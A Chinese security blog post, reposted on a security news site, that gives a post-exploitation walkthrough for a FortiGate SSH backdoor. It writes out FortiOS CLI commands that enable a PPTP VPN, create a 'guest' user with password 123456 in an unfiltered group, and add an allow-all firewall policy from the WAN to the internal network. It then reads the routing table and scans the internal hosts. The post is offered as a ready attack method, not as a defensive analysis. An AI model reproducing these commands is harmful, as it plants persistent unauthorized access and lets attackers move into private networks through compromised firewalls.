飞塔SSH后门 进一步利用方法

没穿底裤 2020年1月1日04:34:33评论662 views字数 763阅读2分32秒阅读模式
摘要

from:tools.pwn.ren昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)
那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。
这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的
vpn服务来进入到内网中 ,从而进行进一步渗透。
0X00 先看下用户组

from:tools.pwn.ren

昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)
那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。
这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的
vpn服务来进入到内网中 ,从而进行进一步渗透。
0X00 先看下用户组

    1. show usergroup

飞塔SSH后门 进一步利用方法
0x01开启vpn

    1. config vpn pptp set status enable set eip 192.168.200.100 set sip 192.168.200.1 set usrgrp Guest-group end config user local edit "guest" set type password set passwd 123456 next end config user group edit "Guest-group" set profile "unfiltered" set member "guest" next end config firewall policy edit 9 set srcintf "wan1" set dstintf "internal" set srcaddr "all" set dstaddr "all" set action accept set schedule "always" set service "ANY" next end

       

飞塔SSH后门 进一步利用方法
0x02 内网进一步渗透
查看路由表

    1. getrouter info routing-table all

飞塔SSH后门 进一步利用方法

这里已经成功连接上,并使用nmap扫描,这里记得你是防火墙root,所以你想去哪就去哪,想干嘛就干嘛。
飞塔SSH后门 进一步利用方法
飞塔SSH后门 进一步利用方法
飞塔SSH后门 进一步利用方法)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:34:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   飞塔SSH后门 进一步利用方法http://cn-sec.com/archives/76695.html

发表评论

匿名网友 填写信息